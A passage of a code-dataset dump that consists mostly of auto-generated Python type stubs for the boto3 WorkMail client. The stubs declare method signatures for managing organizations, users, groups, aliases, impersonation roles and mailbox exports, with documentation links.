to_json_data(errno=Code.PARAMERR, errmsg=err_msg_str)\n\n\n\n\n\n\n\n","sub_path":"djangoproject1/apps/verifications/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"185431180","text":"\"\"\"\nType annotations for workmail service client.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html)\n\nUsage::\n\n ```python\n import boto3\n from mypy_boto3_workmail import WorkMailClient\n\n client: WorkMailClient = boto3.client(\"workmail\")\n ```\n\"\"\"\nimport sys\nfrom typing import Any, Dict, List, Type, overload\n\nfrom botocore.client import BaseClient, ClientMeta\n\nfrom .literals import (\n AccessControlRuleEffectType,\n ImpersonationRoleTypeType,\n MobileDeviceAccessRuleEffectType,\n PermissionTypeType,\n ResourceTypeType,\n)\nfrom .paginator import (\n ListAliasesPaginator,\n ListAvailabilityConfigurationsPaginator,\n ListGroupMembersPaginator,\n ListGroupsPaginator,\n ListMailboxPermissionsPaginator,\n ListOrganizationsPaginator,\n ListResourceDelegatesPaginator,\n ListResourcesPaginator,\n ListUsersPaginator,\n)\nfrom .type_defs import (\n AssumeImpersonationRoleResponseTypeDef,\n BookingOptionsTypeDef,\n CreateGroupResponseTypeDef,\n CreateImpersonationRoleResponseTypeDef,\n CreateMobileDeviceAccessRuleResponseTypeDef,\n CreateOrganizationResponseTypeDef,\n CreateResourceResponseTypeDef,\n CreateUserResponseTypeDef,\n DeleteOrganizationResponseTypeDef,\n DescribeEmailMonitoringConfigurationResponseTypeDef,\n DescribeGroupResponseTypeDef,\n DescribeInboundDmarcSettingsResponseTypeDef,\n DescribeMailboxExportJobResponseTypeDef,\n DescribeOrganizationResponseTypeDef,\n DescribeResourceResponseTypeDef,\n DescribeUserResponseTypeDef,\n DomainTypeDef,\n EwsAvailabilityProviderTypeDef,\n FolderConfigurationTypeDef,\n GetAccessControlEffectResponseTypeDef,\n GetDefaultRetentionPolicyResponseTypeDef,\n GetImpersonationRoleEffectResponseTypeDef,\n GetImpersonationRoleResponseTypeDef,\n GetMailboxDetailsResponseTypeDef,\n GetMailDomainResponseTypeDef,\n GetMobileDeviceAccessEffectResponseTypeDef,\n GetMobileDeviceAccessOverrideResponseTypeDef,\n ImpersonationRuleTypeDef,\n LambdaAvailabilityProviderTypeDef,\n ListAccessControlRulesResponseTypeDef,\n ListAliasesResponseTypeDef,\n ListAvailabilityConfigurationsResponseTypeDef,\n ListGroupMembersResponseTypeDef,\n ListGroupsResponseTypeDef,\n ListImpersonationRolesResponseTypeDef,\n ListMailboxExportJobsResponseTypeDef,\n ListMailboxPermissionsResponseTypeDef,\n ListMailDomainsResponseTypeDef,\n ListMobileDeviceAccessOverridesResponseTypeDef,\n ListMobileDeviceAccessRulesResponseTypeDef,\n ListOrganizationsResponseTypeDef,\n ListResourceDelegatesResponseTypeDef,\n ListResourcesResponseTypeDef,\n ListTagsForResourceResponseTypeDef,\n ListUsersResponseTypeDef,\n StartMailboxExportJobResponseTypeDef,\n TagTypeDef,\n TestAvailabilityConfigurationResponseTypeDef,\n)\n\nif sys.version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal\n\n__all__ = (\"WorkMailClient\",)\n\nclass BotocoreClientError(BaseException):\n MSG_TEMPLATE: str\n\n def __init__(self, error_response: Dict[str, Any], operation_name: str) -> None:\n self.response: Dict[str, Any]\n self.operation_name: str\n\nclass Exceptions:\n ClientError: Type[BotocoreClientError]\n DirectoryInUseException: Type[BotocoreClientError]\n DirectoryServiceAuthenticationFailedException: Type[BotocoreClientError]\n DirectoryUnavailableException: Type[BotocoreClientError]\n EmailAddressInUseException: Type[BotocoreClientError]\n EntityAlreadyRegisteredException: Type[BotocoreClientError]\n EntityNotFoundException: Type[BotocoreClientError]\n EntityStateException: Type[BotocoreClientError]\n InvalidConfigurationException: Type[BotocoreClientError]\n InvalidCustomSesConfigurationException: Type[BotocoreClientError]\n InvalidParameterException: Type[BotocoreClientError]\n InvalidPasswordException: Type[BotocoreClientError]\n LimitExceededException: Type[BotocoreClientError]\n MailDomainInUseException: Type[BotocoreClientError]\n MailDomainNotFoundException: Type[BotocoreClientError]\n MailDomainStateException: Type[BotocoreClientError]\n NameAvailabilityException: Type[BotocoreClientError]\n OrganizationNotFoundException: Type[BotocoreClientError]\n OrganizationStateException: Type[BotocoreClientError]\n ReservedNameException: Type[BotocoreClientError]\n ResourceNotFoundException: Type[BotocoreClientError]\n TooManyTagsException: Type[BotocoreClientError]\n UnsupportedOperationException: Type[BotocoreClientError]\n\nclass WorkMailClient(BaseClient):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html)\n \"\"\"\n\n meta: ClientMeta\n\n @property\n def exceptions(self) -> Exceptions:\n \"\"\"\n WorkMailClient exceptions.\n \"\"\"\n def associate_delegate_to_resource(\n self, *, OrganizationId: str, ResourceId: str, EntityId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Adds a member (user or group) to the resource's set of delegates.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.associate_delegate_to_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#associate_delegate_to_resource)\n \"\"\"\n def associate_member_to_group(\n self, *, OrganizationId: str, GroupId: str, MemberId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Adds a member (user or group) to the group's set.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.associate_member_to_group)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#associate_member_to_group)\n \"\"\"\n def assume_impersonation_role(\n self, *, OrganizationId: str, ImpersonationRoleId: str\n ) -> AssumeImpersonationRoleResponseTypeDef:\n \"\"\"\n Assumes an impersonation role for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.assume_impersonation_role)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#assume_impersonation_role)\n \"\"\"\n def can_paginate(self, operation_name: str) -> bool:\n \"\"\"\n Check if an operation can be paginated.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.can_paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#can_paginate)\n \"\"\"\n def cancel_mailbox_export_job(\n self, *, ClientToken: str, JobId: str, OrganizationId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Cancels a mailbox export job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.cancel_mailbox_export_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#cancel_mailbox_export_job)\n \"\"\"\n def close(self) -> None:\n \"\"\"\n Closes underlying endpoint connections.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.close)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#close)\n \"\"\"\n def create_alias(self, *, OrganizationId: str, EntityId: str, Alias: str) -> Dict[str, Any]:\n \"\"\"\n Adds an alias to the set of a given member (user or group) of WorkMail.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_alias)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_alias)\n \"\"\"\n def create_availability_configuration(\n self,\n *,\n OrganizationId: str,\n DomainName: str,\n ClientToken: str = None,\n EwsProvider: \"EwsAvailabilityProviderTypeDef\" = None,\n LambdaProvider: \"LambdaAvailabilityProviderTypeDef\" = None\n ) -> Dict[str, Any]:\n \"\"\"\n Creates an `AvailabilityConfiguration` for the given WorkMail organization and\n domain.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_availability_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_availability_configuration)\n \"\"\"\n def create_group(self, *, OrganizationId: str, Name: str) -> CreateGroupResponseTypeDef:\n \"\"\"\n Creates a group that can be used in WorkMail by calling the RegisterToWorkMail\n operation.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_group)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_group)\n \"\"\"\n def create_impersonation_role(\n self,\n *,\n OrganizationId: str,\n Name: str,\n Type: ImpersonationRoleTypeType,\n Rules: List[\"ImpersonationRuleTypeDef\"],\n ClientToken: str = None,\n Description: str = None\n ) -> CreateImpersonationRoleResponseTypeDef:\n \"\"\"\n Creates an impersonation role for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_impersonation_role)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_impersonation_role)\n \"\"\"\n def create_mobile_device_access_rule(\n self,\n *,\n OrganizationId: str,\n Name: str,\n Effect: MobileDeviceAccessRuleEffectType,\n ClientToken: str = None,\n Description: str = None,\n DeviceTypes: List[str] = None,\n NotDeviceTypes: List[str] = None,\n DeviceModels: List[str] = None,\n NotDeviceModels: List[str] = None,\n DeviceOperatingSystems: List[str] = None,\n NotDeviceOperatingSystems: List[str] = None,\n DeviceUserAgents: List[str] = None,\n NotDeviceUserAgents: List[str] = None\n ) -> CreateMobileDeviceAccessRuleResponseTypeDef:\n \"\"\"\n Creates a new mobile device access rule for the specified WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_mobile_device_access_rule)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_mobile_device_access_rule)\n \"\"\"\n def create_organization(\n self,\n *,\n Alias: str,\n DirectoryId: str = None,\n ClientToken: str = None,\n Domains: List[\"DomainTypeDef\"] = None,\n KmsKeyArn: str = None,\n EnableInteroperability: bool = None\n ) -> CreateOrganizationResponseTypeDef:\n \"\"\"\n Creates a new WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_organization)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_organization)\n \"\"\"\n def create_resource(\n self, *, OrganizationId: str, Name: str, Type: ResourceTypeType\n ) -> CreateResourceResponseTypeDef:\n \"\"\"\n Creates a new WorkMail resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_resource)\n \"\"\"\n def create_user(\n self, *, OrganizationId: str, Name: str, DisplayName: str, Password: str\n ) -> CreateUserResponseTypeDef:\n \"\"\"\n Creates a user who can be used in WorkMail by calling the RegisterToWorkMail\n operation.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_user)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_user)\n \"\"\"\n def delete_access_control_rule(self, *, OrganizationId: str, Name: str) -> Dict[str, Any]:\n \"\"\"\n Deletes an access control rule for the specified WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_access_control_rule)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_access_control_rule)\n \"\"\"\n def delete_alias(self, *, OrganizationId: str, EntityId: str, Alias: str) -> Dict[str, Any]:\n \"\"\"\n Remove one or more specified aliases from a set of aliases for a given user.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_alias)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_alias)\n \"\"\"\n def delete_availability_configuration(\n self, *, OrganizationId: str, DomainName: str\n ) -> Dict[str, Any]:\n \"\"\"\n Deletes the `AvailabilityConfiguration` for the given WorkMail organization and\n domain.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_availability_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_availability_configuration)\n \"\"\"\n def delete_email_monitoring_configuration(self, *, OrganizationId: str) -> Dict[str, Any]:\n \"\"\"\n Deletes the email monitoring configuration for a specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_email_monitoring_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_email_monitoring_configuration)\n \"\"\"\n def delete_group(self, *, OrganizationId: str, GroupId: str) -> Dict[str, Any]:\n \"\"\"\n Deletes a group from WorkMail.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_group)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_group)\n \"\"\"\n def delete_impersonation_role(\n self, *, OrganizationId: str, ImpersonationRoleId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Deletes an impersonation role for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_impersonation_role)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_impersonation_role)\n \"\"\"\n def delete_mailbox_permissions(\n self, *, OrganizationId: str, EntityId: str, GranteeId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Deletes permissions granted to a member (user or group).\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_mailbox_permissions)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_mailbox_permissions)\n \"\"\"\n def delete_mobile_device_access_override(\n self, *, OrganizationId: str, UserId: str, DeviceId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Deletes the mobile device access override for the given WorkMail organization,\n user, and device.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_mobile_device_access_override)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_mobile_device_access_override)\n \"\"\"\n def delete_mobile_device_access_rule(\n self, *, OrganizationId: str, MobileDeviceAccessRuleId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Deletes a mobile device access rule for the specified WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_mobile_device_access_rule)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_mobile_device_access_rule)\n \"\"\"\n def delete_organization(\n self, *, OrganizationId: str, DeleteDirectory: bool, ClientToken: str = None\n ) -> DeleteOrganizationResponseTypeDef:\n \"\"\"\n Deletes an WorkMail organization and all underlying AWS resources managed by\n WorkMail as part of the organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_organization)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_organization)\n \"\"\"\n def delete_resource(self, *, OrganizationId: str, ResourceId: str) -> Dict[str, Any]:\n \"\"\"\n Deletes the specified resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_resource)\n \"\"\"\n def delete_retention_policy(self, *, OrganizationId: str, Id: str) -> Dict[str, Any]:\n \"\"\"\n Deletes the specified retention policy from the specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_retention_policy)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_retention_policy)\n \"\"\"\n def delete_user(self, *, OrganizationId: str, UserId: str) -> Dict[str, Any]:\n \"\"\"\n Deletes a user from WorkMail and all subsequent systems.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_user)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_user)\n \"\"\"\n def deregister_from_work_mail(self, *, OrganizationId: str, EntityId: str) -> Dict[str, Any]:\n \"\"\"\n Mark a user, group, or resource as no longer used in WorkMail.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.deregister_from_work_mail)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#deregister_from_work_mail)\n \"\"\"\n def deregister_mail_domain(self, *, OrganizationId: str, DomainName: str) -> Dict[str, Any]:\n \"\"\"\n Removes a domain from WorkMail, stops email routing to WorkMail, and removes the\n authorization allowing WorkMail use.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.deregister_mail_domain)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#deregister_mail_domain)\n \"\"\"\n def describe_email_monitoring_configuration(\n self, *, OrganizationId: str\n ) -> DescribeEmailMonitoringConfigurationResponseTypeDef:\n \"\"\"\n Describes the current email monitoring configuration for a specified\n organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_email_monitoring_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_email_monitoring_configuration)\n \"\"\"\n def describe_group(self, *, OrganizationId: str, GroupId: str) -> DescribeGroupResponseTypeDef:\n \"\"\"\n Returns the data available for the group.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_group)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_group)\n \"\"\"\n def describe_inbound_dmarc_settings(\n self, *, OrganizationId: str\n ) -> DescribeInboundDmarcSettingsResponseTypeDef:\n \"\"\"\n Lists the settings in a DMARC policy for a specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_inbound_dmarc_settings)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_inbound_dmarc_settings)\n \"\"\"\n def describe_mailbox_export_job(\n self, *, JobId: str, OrganizationId: str\n ) -> DescribeMailboxExportJobResponseTypeDef:\n \"\"\"\n Describes the current status of a mailbox export job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_mailbox_export_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_mailbox_export_job)\n \"\"\"\n def describe_organization(self, *, OrganizationId: str) -> DescribeOrganizationResponseTypeDef:\n \"\"\"\n Provides more information regarding a given organization based on its\n identifier.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_organization)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_organization)\n \"\"\"\n def describe_resource(\n self, *, OrganizationId: str, ResourceId: str\n ) -> DescribeResourceResponseTypeDef:\n \"\"\"\n Returns the data available for the resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_resource)\n \"\"\"\n def describe_user(self, *, OrganizationId: str, UserId: str) -> DescribeUserResponseTypeDef:\n \"\"\"\n Provides information regarding the user.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_user)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_user)\n \"\"\"\n def disassociate_delegate_from_resource(\n self, *, OrganizationId: str, ResourceId: str, EntityId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Removes a member from the resource's set of delegates.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.disassociate_delegate_from_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#disassociate_delegate_from_resource)\n \"\"\"\n def disassociate_member_from_group(\n self, *, OrganizationId: str, GroupId: str, MemberId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Removes a member from a group.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.disassociate_member_from_group)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#disassociate_member_from_group)\n \"\"\"\n def generate_presigned_url(\n self,\n ClientMethod: str,\n Params: Dict[str, Any] = None,\n ExpiresIn: int = 3600,\n HttpMethod: str = None,\n ) -> str:\n \"\"\"\n Generate a presigned url given a client, its method, and arguments.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.generate_presigned_url)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#generate_presigned_url)\n \"\"\"\n def get_access_control_effect(\n self,\n *,\n OrganizationId: str,\n IpAddress: str,\n Action: str,\n UserId: str = None,\n ImpersonationRoleId: str = None\n ) -> GetAccessControlEffectResponseTypeDef:\n \"\"\"\n Gets the effects of an organization's access control rules as they apply to a\n specified IPv4 address, access protocol action, and user ID or impersonation\n role ID.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_access_control_effect)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_access_control_effect)\n \"\"\"\n def get_default_retention_policy(\n self, *, OrganizationId: str\n ) -> GetDefaultRetentionPolicyResponseTypeDef:\n \"\"\"\n Gets the default retention policy details for the specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_default_retention_policy)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_default_retention_policy)\n \"\"\"\n def get_impersonation_role(\n self, *, OrganizationId: str, ImpersonationRoleId: str\n ) -> GetImpersonationRoleResponseTypeDef:\n \"\"\"\n Gets the impersonation role details for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_impersonation_role)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_impersonation_role)\n \"\"\"\n def get_impersonation_role_effect(\n self, *, OrganizationId: str, ImpersonationRoleId: str, TargetUser: str\n ) -> GetImpersonationRoleEffectResponseTypeDef:\n \"\"\"\n Tests whether the given impersonation role can impersonate a target user.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_impersonation_role_effect)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_impersonation_role_effect)\n \"\"\"\n def get_mail_domain(\n self, *, OrganizationId: str, DomainName: str\n ) -> GetMailDomainResponseTypeDef:\n \"\"\"\n Gets details for a mail domain, including domain records required to configure\n your domain with recommended security.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_mail_domain)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_mail_domain)\n \"\"\"\n def get_mailbox_details(\n self, *, OrganizationId: str, UserId: str\n ) -> GetMailboxDetailsResponseTypeDef:\n \"\"\"\n Requests a user's mailbox details for a specified organization and user.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_mailbox_details)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_mailbox_details)\n \"\"\"\n def get_mobile_device_access_effect(\n self,\n *,\n OrganizationId: str,\n DeviceType: str = None,\n DeviceModel: str = None,\n DeviceOperatingSystem: str = None,\n DeviceUserAgent: str = None\n ) -> GetMobileDeviceAccessEffectResponseTypeDef:\n \"\"\"\n Simulates the effect of the mobile device access rules for the given attributes\n of a sample access event.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_mobile_device_access_effect)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_mobile_device_access_effect)\n \"\"\"\n def get_mobile_device_access_override(\n self, *, OrganizationId: str, UserId: str, DeviceId: str\n ) -> GetMobileDeviceAccessOverrideResponseTypeDef:\n \"\"\"\n Gets the mobile device access override for the given WorkMail organization,\n user, and device.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_mobile_device_access_override)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_mobile_device_access_override)\n \"\"\"\n def list_access_control_rules(\n self, *, OrganizationId: str\n ) -> ListAccessControlRulesResponseTypeDef:\n \"\"\"\n Lists the access control rules for the specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_access_control_rules)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_access_control_rules)\n \"\"\"\n def list_aliases(\n self, *, OrganizationId: str, EntityId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListAliasesResponseTypeDef:\n \"\"\"\n Creates a paginated call to list the aliases associated with a given entity.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_aliases)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_aliases)\n \"\"\"\n def list_availability_configurations(\n self, *, OrganizationId: str, MaxResults: int = None, NextToken: str = None\n ) -> ListAvailabilityConfigurationsResponseTypeDef:\n \"\"\"\n List all the `AvailabilityConfiguration` 's for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_availability_configurations)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_availability_configurations)\n \"\"\"\n def list_group_members(\n self, *, OrganizationId: str, GroupId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListGroupMembersResponseTypeDef:\n \"\"\"\n Returns an overview of the members of a group.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_group_members)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_group_members)\n \"\"\"\n def list_groups(\n self, *, OrganizationId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListGroupsResponseTypeDef:\n \"\"\"\n Returns summaries of the organization's groups.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_groups)\n [Show boto3-stubs 